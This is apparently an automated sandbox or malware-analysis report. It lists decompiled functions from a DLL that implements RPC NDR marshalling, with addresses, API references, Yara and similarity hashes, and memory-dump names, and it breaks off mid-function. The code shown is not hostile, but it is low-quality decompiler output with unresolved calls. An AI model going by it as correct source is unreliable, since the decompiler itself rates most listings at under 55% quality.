                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: -- %p$overflow of adjusted_len %ld, len %ld
                                                                                                • API String ID: 3997070919-2781439172
                                                                                                • Opcode ID: 725e29cc9d2c9387e2a4d6c6aba4837f6ba7ca92af6edc31b4633b8c40b51412
                                                                                                • Instruction ID: df96f5c5b747cce2a4da692835396023981385285fc5e8cd284202f9a9d6a273
                                                                                                • Opcode Fuzzy Hash: 725e29cc9d2c9387e2a4d6c6aba4837f6ba7ca92af6edc31b4633b8c40b51412
                                                                                                • Instruction Fuzzy Hash: 663169B5A04208EFCB04CFD8C884ADEBFB5EF4A314F148698E9499B355D330AA06DF51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA1910, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 148COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 37%
                                                                                                			E6EDA1910(intOrPtr _a4, signed char* _a8, signed char* _a12) {
				signed char _v5;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed char* _t77;
				signed char* _t105;
				signed char* _t126;
				intOrPtr _t130;

				0x6eda0000("(%p, %p, %p)\n", _a4, _a8, _a12);
				if(( *_a12 & 0x000000ff) == 0x1f || ( *_a12 & 0x000000ff) == 0x20) {
					_v5 = (_a12[1] & 0x000000ff) + 1;
					_t126 = _a12;
					__eflags = ( *_t126 & 0x000000ff) - 0x1f;
					if(( *_t126 & 0x000000ff) != 0x1f) {
						_a12 =  &(_a12[2]);
						_a12 =  &(_a12[4]);
						_v12 =  *_a12;
						_t105 =  &(_a12[4]);
						__eflags = _t105;
						_a12 = _t105;
					} else {
						_a12 =  &(_a12[2]);
						_a12 =  &(_a12[2]);
						_v12 =  *_a12 & 0x0000ffff;
						_a12 =  &(_a12[2]);
					}
					_v16 =  *_a12 & 0x0000ffff;
					_a12 =  &(_a12[2]);
					_t77 = _a8;
					0x6eda0000(_a4, _t77, _a12, 0);
					_a12 = _t77;
					_t130 = _a4;
					__eflags =  *((intOrPtr*)(_t130 + 0x44)) - _v12;
					if( *((intOrPtr*)(_t130 + 0x44)) > _v12) {
						L8:
						__imp__RpcRaiseException(0x6c6);
						return 0;
					} else {
						__eflags =  *((intOrPtr*)(_a4 + 0x44)) +  *((intOrPtr*)(_a4 + 0x40)) - _v12;
						if(__eflags <= 0) {
							E6EDAA800(_a4, __eflags, _a4);
							E6EDA7400(_a4, _a4 + 4, _v5 & 0x000000ff);
							_v20 = E6EDAAEC0(_v16,  *((intOrPtr*)(_a4 + 0x44)));
							 *((intOrPtr*)(_a4 + 0x10)) =  *((intOrPtr*)(_a4 + 4));
							E6EDAB030(_a4, _a8 +  *((intOrPtr*)(_a4 + 0x40)), _v20);
							E6EDABFC0(_a4, _a8, _a12);
							__eflags = 0;
							return 0;
						}
						goto L8;
					}
				} else {
					0x6eda0000("invalid format type %x\n",  *_a12 & 0x000000ff);
					__imp__RpcRaiseException(0x6e6);
					return 0;
				}
			}











                                                                                                0x6eda1927
                                                                                                0x6eda1941
                                                                                                0x6eda1998
                                                                                                0x6eda19a3
                                                                                                0x6eda19aa
                                                                                                0x6eda19ad
                                                                                                0x6eda19db
                                                                                                0x6eda19e4
                                                                                                0x6eda19ec
                                                                                                0x6eda19f2
                                                                                                0x6eda19f2
                                                                                                0x6eda19f5
                                                                                                0x6eda19af
                                                                                                0x6eda19b5
                                                                                                0x6eda19be
                                                                                                0x6eda19c7
                                                                                                0x6eda19d0
                                                                                                0x6eda19d0
                                                                                                0x6eda19fe
                                                                                                0x6eda1a07
                                                                                                0x6eda1a10
                                                                                                0x6eda1a18
                                                                                                0x6eda1a20
                                                                                                0x6eda1a23
                                                                                                0x6eda1a29
                                                                                                0x6eda1a2c
                                                                                                0x6eda1a3f
                                                                                                0x6eda1a44
                                                                                                0x00000000
                                                                                                0x6eda1a2e
                                                                                                0x6eda1a3a
                                                                                                0x6eda1a3d
                                                                                                0x6eda1a52
                                                                                                0x6eda1a66
                                                                                                0x6eda1a81
                                                                                                0x6eda1a8d
                                                                                                0x6eda1aa2
                                                                                                0x6eda1ab6
                                                                                                0x6eda1abe
                                                                                                0x00000000
                                                                                                0x6eda1abe
                                                                                                0x00000000
                                                                                                0x6eda1a3d
                                                                                                0x6eda1957
                                                                                                0x6eda196c
                                                                                                0x6eda1979
                                                                                                0x00000000
                                                                                                0x6eda197f

                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA1979
                                                                                                • RpcRaiseException.RPCRT4(000006C6), ref: 6EDA1A44
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (%p, %p, %p)$invalid format type %x
                                                                                                • API String ID: 3997070919-2648126113
                                                                                                • Opcode ID: 3751fa0a108253ed08cb372333bbd17c9dc46fa0352b2ebd89efa9d8d3405c76
                                                                                                • Instruction ID: bc00269d58b713cc0d912c53d766af25dba2ee12ece0d5699d778a55c8a58252
                                                                                                • Opcode Fuzzy Hash: 3751fa0a108253ed08cb372333bbd17c9dc46fa0352b2ebd89efa9d8d3405c76
                                                                                                • Instruction Fuzzy Hash: 485144B56002499FDB04CF9CC890AAF7BB6FF89344F148958F9558B345D731EA61CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA54A0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 37%
                                                                                                			E6EDA54A0(intOrPtr _a4, signed char* _a8, signed char* _a12) {
				signed char _v5;
				signed int _v12;
				signed int _v16;
				signed char* _t68;
				intOrPtr _t69;
				signed char* _t89;
				signed char* _t108;

				0x6eda0000("(%p, %p, %p)\n", _a4, _a8, _a12);
				if(( *_a12 & 0x000000ff) == 0x1f || ( *_a12 & 0x000000ff) == 0x20) {
					_v5 = (_a12[1] & 0x000000ff) + 1;
					_t108 = _a12;
					__eflags = ( *_t108 & 0x000000ff) - 0x1f;
					if(( *_t108 & 0x000000ff) != 0x1f) {
						_a12 =  &(_a12[2]);
						_a12 =  &(_a12[4]);
						_v12 =  *_a12;
						_t89 =  &(_a12[4]);
						__eflags = _t89;
						_a12 = _t89;
					} else {
						_a12 =  &(_a12[2]);
						_a12 =  &(_a12[2]);
						_v12 =  *_a12 & 0x0000ffff;
						_a12 =  &(_a12[2]);
					}
					_v16 =  *_a12 & 0x0000ffff;
					_a12 =  &(_a12[2]);
					_t68 = _a8;
					0x6eda0000(_a4, _t68, _a12, 0);
					_a12 = _t68;
					_t69 =  *((intOrPtr*)(_a4 + 0x44));
					__eflags = _t69 - _v12;
					if(_t69 > _v12) {
						L8:
						__imp__RpcRaiseException(0x6c6);
						return _t69;
					} else {
						_t69 = _a4;
						__eflags =  *((intOrPtr*)(_a4 + 0x44)) +  *((intOrPtr*)(_t69 + 0x40)) - _v12;
						if(__eflags <= 0) {
							E6EDAA9B0(__eflags, _a4);
							__eflags = _a4 + 0x14;
							E6EDA73B0(_a4 + 0x14, _v5 & 0x000000ff);
							E6EDAAF50(_a4, E6EDAAEC0(_v16,  *((intOrPtr*)(_a4 + 0x44))));
							return E6EDAC570(_a4, _a8, _a12);
						}
						goto L8;
					}
				} else {
					0x6eda0000("invalid format type %x\n",  *_a12 & 0x000000ff);
					__imp__RpcRaiseException(0x6e6);
					return 0;
				}
			}










                                                                                                0x6eda54b7
                                                                                                0x6eda54d1
                                                                                                0x6eda5526
                                                                                                0x6eda5531
                                                                                                0x6eda5538
                                                                                                0x6eda553b
                                                                                                0x6eda5569
                                                                                                0x6eda5572
                                                                                                0x6eda557a
                                                                                                0x6eda5580
                                                                                                0x6eda5580
                                                                                                0x6eda5583
                                                                                                0x6eda553d
                                                                                                0x6eda5543
                                                                                                0x6eda554c
                                                                                                0x6eda5555
                                                                                                0x6eda555e
                                                                                                0x6eda555e
                                                                                                0x6eda558c
                                                                                                0x6eda5595
                                                                                                0x6eda559e
                                                                                                0x6eda55a6
                                                                                                0x6eda55ae
                                                                                                0x6eda55b4
                                                                                                0x6eda55b7
                                                                                                0x6eda55ba
                                                                                                0x6eda55cd
                                                                                                0x6eda55d2
                                                                                                0x00000000
                                                                                                0x6eda55bc
                                                                                                0x6eda55c2
                                                                                                0x6eda55c8
                                                                                                0x6eda55cb
                                                                                                0x6eda55de
                                                                                                0x6eda55ee
                                                                                                0x6eda55f2
                                                                                                0x6eda5612
                                                                                                0x00000000
                                                                                                0x6eda562b
                                                                                                0x00000000
                                                                                                0x6eda55cb
                                                                                                0x6eda54e7
                                                                                                0x6eda54fc
                                                                                                0x6eda5509
                                                                                                0x00000000
                                                                                                0x6eda5509

                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA5509
                                                                                                • RpcRaiseException.RPCRT4(000006C6), ref: 6EDA55D2
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (%p, %p, %p)$invalid format type %x
                                                                                                • API String ID: 3997070919-2648126113
                                                                                                • Opcode ID: c3930c2139d61c1ecc409777772e8b00ec686fccdfb4ce6ecc0dbf077f74de73
                                                                                                • Instruction ID: 641a6e452ca4e291a395044b38eddf96e5e4ffd12166056f46dfb70708b024c8
                                                                                                • Opcode Fuzzy Hash: c3930c2139d61c1ecc409777772e8b00ec686fccdfb4ce6ecc0dbf077f74de73
                                                                                                • Instruction Fuzzy Hash: BC5165B5A042899FDB04DF9CD890AAF7BB6FF85304F048558FA558B345D731EA60CBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA5640, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 110COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 37%
                                                                                                			E6EDA5640(int _a4, WCHAR* _a8, signed char* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t72;
				intOrPtr _t73;
				signed char* _t85;

				_v8 = 0;
				0x6eda0000("(%p,%p,%p)\n", _a4, _a8, _a12);
				if(( *_a12 & 0x000000ff) != 0x21) {
					_t85 = _a12;
					0x6eda0000("invalid format type %x\n",  *_t85 & 0x000000ff);
					__imp__RpcRaiseException(0x6e6);
					return _t85;
				}
				if( *((intOrPtr*)(_a4 + 0x30)) == 0 &&  *((intOrPtr*)(_a4 + 0x6c)) == 0) {
					_v12 =  *((intOrPtr*)(_a4 + 0x30));
					_v28 =  *((intOrPtr*)(_a4 + 0x14));
					_v24 =  *((intOrPtr*)(_a4 + 0x3c));
					_v20 =  *((intOrPtr*)(_a4 + 0x40));
					_v16 =  *((intOrPtr*)(_a4 + 0x44));
					 *((intOrPtr*)(_a4 + 0x30)) = 1;
					E6EDA5640(_a4, _a8, _a12);
					 *((intOrPtr*)(_a4 + 0x30)) = _v12;
					 *((intOrPtr*)(_a4 + 0x6c)) =  *((intOrPtr*)(_a4 + 0x14));
					_v8 = 1;
					 *((intOrPtr*)(_a4 + 0x44)) = _v16;
					 *((intOrPtr*)(_a4 + 0x40)) = _v20;
					 *((intOrPtr*)(_a4 + 0x3c)) = _v24;
					 *((intOrPtr*)(_a4 + 0x14)) = _v28;
				}
				E6EDACC40(0x21, _a4, _a8, _a12);
				_t72 = E6EDACE70(0x21, _a4, _a8, _a12, 1);
				if(_v8 != 0) {
					_t73 =  *((intOrPtr*)(_a4 + 0x6c));
					 *((intOrPtr*)(_a4 + 0x14)) = _t73;
					 *((intOrPtr*)(_a4 + 0x6c)) = 0;
					return _t73;
				}
				return _t72;
			}












                                                                                                0x6eda5646
                                                                                                0x6eda565e
                                                                                                0x6eda5678
                                                                                                0x6eda5682
                                                                                                0x6eda568f
                                                                                                0x6eda569c
                                                                                                0x00000000
                                                                                                0x6eda569c
                                                                                                0x6eda56ae
                                                                                                0x6eda56c7
                                                                                                0x6eda56d0
                                                                                                0x6eda56d9
                                                                                                0x6eda56e2
                                                                                                0x6eda56eb
                                                                                                0x6eda56f1
                                                                                                0x6eda5704
                                                                                                0x6eda570f
                                                                                                0x6eda571b
                                                                                                0x6eda571e
                                                                                                0x6eda572b
                                                                                                0x6eda5734
                                                                                                0x6eda573d
                                                                                                0x6eda5746
                                                                                                0x6eda5746
                                                                                                0x6eda5757
                                                                                                0x6eda576f
                                                                                                0x6eda577b
                                                                                                0x6eda5783
                                                                                                0x6eda5786
                                                                                                0x6eda578c
                                                                                                0x00000000
                                                                                                0x6eda578c
                                                                                                0x6eda5796

                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA569C
                                                                                                • _NdrComplexArrayBufferSize@12.SOZZ(00000001,?,?), ref: 6EDA5704
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ArrayBufferComplexExceptionRaiseSize@12
                                                                                                • String ID: (%p,%p,%p)$invalid format type %x
                                                                                                • API String ID: 1767167962-814374321
                                                                                                • Opcode ID: 0660094ba33daa652cd649061ab76c37942151a11502ccb336915c79f38b49cf
                                                                                                • Instruction ID: 68d7acb66765dce48d51bc43a854207ed24360ebb714fff6e6195ecf54dcb66a
                                                                                                • Opcode Fuzzy Hash: 0660094ba33daa652cd649061ab76c37942151a11502ccb336915c79f38b49cf
                                                                                                • Instruction Fuzzy Hash: 7541C7B9A00209EFDB44CF88D490AAA7BB5FF88354F108159FD488B341D771EA81CFA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA4580, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 108memoryCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 53%
                                                                                                			E6EDA4580(void* __eflags, signed int _a4, signed int* _a8, signed short* _a12, signed int _a16) {
				signed int _v5;
				signed char _v6;
				signed int _v12;
				intOrPtr _v16;
				char _v20;
				signed int _t54;
				void* _t94;
				void* _t98;

				0x6eda0000("(%p, %p, %p, %d)\n", _a4, _a8, _a12, _a16 & 0x000000ff);
				_a12 =  &(_a12[0]);
				_v6 =  *_a12 & 0xf;
				_v5 = ( *_a12 & 0xf0) >> 4;
				_a12 =  &(_a12[0]);
				E6EDA73D0(_v5 & 0x000000ff, _a4 + 4, _v5 & 0x000000ff);
				_v16 = E6EDAE930( *((intOrPtr*)(_a4 + 4)), _v6 & 0x000000ff,  *((intOrPtr*)(_a4 + 4)));
				0x6eda0000("got switch value 0x%x\n", _v16);
				_t98 = _t94 + 0x2c;
				_v12 = ( *_a12 & 0x0000ffff) + (_v5 & 0x000000ff);
				if((_a16 & 0x000000ff) == 0 &&  *_a8 == 0) {
					_a16 = 1;
				}
				_t54 = _a16 & 0x000000ff;
				if(_t54 != 0) {
					__imp__NdrAllocate(_a4, _v12 & 0x0000ffff);
					 *_a8 = _t54;
				}
				if((_a16 & 0x000000ff) != 0) {
					E6EDB0770( *_a8, 0, _v12 & 0x0000ffff);
					_t98 = _t98 + 0xc;
				}
				E6EDA77F0(_a4, _a8,  &_v6, 0);
				_v20 = (_v5 & 0x000000ff) +  *_a8;
				return E6EDAED20(_a4,  &_v20, _v16, _a12, 0);
			}











                                                                                                0x6eda459c
                                                                                                0x6eda45aa
                                                                                                0x6eda45b6
                                                                                                0x6eda45c8
                                                                                                0x6eda45d1
                                                                                                0x6eda45e0
                                                                                                0x6eda45fc
                                                                                                0x6eda4608
                                                                                                0x6eda460d
                                                                                                0x6eda461c
                                                                                                0x6eda4626
                                                                                                0x6eda4630
                                                                                                0x6eda4630
                                                                                                0x6eda4634
                                                                                                0x6eda463a
                                                                                                0x6eda4645
                                                                                                0x6eda464e
                                                                                                0x6eda464e
                                                                                                0x6eda4656
                                                                                                0x6eda4665
                                                                                                0x6eda466a
                                                                                                0x6eda466a
                                                                                                0x6eda467b
                                                                                                0x6eda4689
                                                                                                0x6eda46a9

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Allocate_memset
                                                                                                • String ID: (%p, %p, %p, %d)$got switch value 0x%x
                                                                                                • API String ID: 3995017260-3216196450
                                                                                                • Opcode ID: 312c67792c18e7ddb0f5c715fc4a7d996c3dac884090ec89b1d6dba25308c205
                                                                                                • Instruction ID: 565637d6e60c83fdefc2c45eab52fdd8cc17a24525483a424c873687dc7323e7
                                                                                                • Opcode Fuzzy Hash: 312c67792c18e7ddb0f5c715fc4a7d996c3dac884090ec89b1d6dba25308c205
                                                                                                • Instruction Fuzzy Hash: 794182B5904289ABCB04CFA8D850AFF7BB9AF49205F048588FD559B382D735D610DB71
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA6E30, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA6E97
                                                                                                • RpcRaiseException.RPCRT4(000006C6), ref: 6EDA6F42
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (%p, %p, %p)$invalid format type %x
                                                                                                • API String ID: 3997070919-2648126113
                                                                                                • Opcode ID: 4edacebb3cf9910459c63f48bd5b673020c5bddccac23e2c79045103bf9e74fe
                                                                                                • Instruction ID: b1ee208114508d5c5f3fbc4675fafc8d2f7a74a8943e0035acc9243219c3ecce
                                                                                                • Opcode Fuzzy Hash: 4edacebb3cf9910459c63f48bd5b673020c5bddccac23e2c79045103bf9e74fe
                                                                                                • Instruction Fuzzy Hash: 8F413EB160424ADFDB08CF9CC890AAF77A6FF85304F148559FA658B345D731EA60CB94
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA1310, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 103COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 44%
                                                                                                			E6EDA1310(signed int _a4, intOrPtr _a8, signed char* _a12) {
				signed char* _v8;
				signed char* _v12;

				_v8 = _a12;
				0x6eda0000("(%p, %p, %p)\n", _a4, _a8, _a12);
				_a12 = _a12 + 6;
				if(( *_v8 & 0x000000ff) == 0x19) {
					_v12 =  &(_v8[_v8[4] + 4]);
					E6EDAD120( *_v12 & 0x000000ff, _a4, (_v8[2] & 0x0000ffff) + _a8, _v12);
					E6EDA7400(_v8, _a4 + 4, (_v8[1] & 0x000000ff) + 1);
					0x6eda0000("memory_size = %d\n", _v8[2] & 0x0000ffff);
					 *((intOrPtr*)(_a4 + 0x10)) =  *((intOrPtr*)(_a4 + 4));
					E6EDAB030(_a4, _a8, _v8[2] & 0x0000ffff);
					E6EDAD360( *_v12 & 0x000000ff, _a4, (_v8[2] & 0x0000ffff) + _a8, _v12, 0);
					E6EDABFC0(_a4, _a8, _a12);
					return 0;
				}
				0x6eda0000("invalid format type %x\n",  *_v8 & 0x000000ff);
				__imp__RpcRaiseException(0x6e6);
				return 0;
			}





                                                                                                0x6eda1319
                                                                                                0x6eda132d
                                                                                                0x6eda133b
                                                                                                0x6eda1347
                                                                                                0x6eda137d
                                                                                                0x6eda139a
                                                                                                0x6eda13b4
                                                                                                0x6eda13c9
                                                                                                0x6eda13da
                                                                                                0x6eda13ed
                                                                                                0x6eda1411
                                                                                                0x6eda1425
                                                                                                0x00000000
                                                                                                0x6eda142d
                                                                                                0x6eda1355
                                                                                                0x6eda1362
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA1362
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (%p, %p, %p)$invalid format type %x$memory_size = %d
                                                                                                • API String ID: 3997070919-3112743540
                                                                                                • Opcode ID: a86e9498e6ed5b989e53f36243bf9af8210501cd2e2ba33e55cbc835b0f8d7b8
                                                                                                • Instruction ID: 4198b0060e38882d7327cde32868344ce5d219abce52d9950d8811743c012077
                                                                                                • Opcode Fuzzy Hash: a86e9498e6ed5b989e53f36243bf9af8210501cd2e2ba33e55cbc835b0f8d7b8
                                                                                                • Instruction Fuzzy Hash: 82414FB5904108BBCB04CFD8D890DAEBBF9AF89205F148588F9599B345E631EB51CBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA2460, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 101COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006F7), ref: 6EDA24E5
                                                                                                • NDRSContextMarshall2.RPCRT4(?,?,?,?,?,?), ref: 6EDA2571
                                                                                                Strings
                                                                                                • (%p, %p, %p, %p), xrefs: 6EDA2484
                                                                                                • buffer overflow - Buffer = %p, BufferEnd = %p, xrefs: 6EDA24D3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ContextExceptionMarshall2Raise
                                                                                                • String ID: (%p, %p, %p, %p)$buffer overflow - Buffer = %p, BufferEnd = %p
                                                                                                • API String ID: 3146093750-483450353
                                                                                                • Opcode ID: 2a518355663e15844129661d052dea7559ef1b63e68769af0d4ac6ee189c5f92
                                                                                                • Instruction ID: 9b04de74fbbe572b0a60a80e6be5664b57327e33403819c4e2af36ab35367b65
                                                                                                • Opcode Fuzzy Hash: 2a518355663e15844129661d052dea7559ef1b63e68769af0d4ac6ee189c5f92
                                                                                                • Instruction Fuzzy Hash: 3A410E75600508EFDB04CF88D8A0FAA7BB6FF89344F14C158F95A9B395D631EA51CBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA4BC0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 99COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006F7), ref: 6EDA4C3D
                                                                                                • NDRSContextUnmarshall2.RPCRT4(00000000,00000000,?,?,00000000), ref: 6EDA4CCB
                                                                                                Strings
                                                                                                • (%p, %p), xrefs: 6EDA4BDC
                                                                                                • buffer overflow - Buffer = %p, BufferEnd = %p, xrefs: 6EDA4C2B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ContextExceptionRaiseUnmarshall2
                                                                                                • String ID: (%p, %p)$buffer overflow - Buffer = %p, BufferEnd = %p
                                                                                                • API String ID: 3284517403-1857928792
                                                                                                • Opcode ID: 8f868eeb62c56d26d3d637736535a3a7344cf659a9af350abda93cfabd7c5418
                                                                                                • Instruction ID: f89f94b9a863d7938eb839db0bdce7e2f468f2d16ba598ba229406fa17b89cc8
                                                                                                • Opcode Fuzzy Hash: 8f868eeb62c56d26d3d637736535a3a7344cf659a9af350abda93cfabd7c5418
                                                                                                • Instruction Fuzzy Hash: 13410B75A00508EFDB04CF88C490FAABBB6FF89344F14C198E9599F395D631EA51CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA4F50, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 95COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 44%
                                                                                                			E6EDA4F50(int _a4, intOrPtr _a8, signed char* _a12) {
				signed char* _v8;
				signed char* _v12;
				signed int _t41;

				_v8 = _a12;
				0x6eda0000("(%p, %p, %p)\n", _a4, _a8, _a12);
				_a12 = _a12 + 6;
				_t41 =  *_v8 & 0x000000ff;
				if(_t41 == 0x19) {
					_v12 =  &(_v8[_v8[4] + 4]);
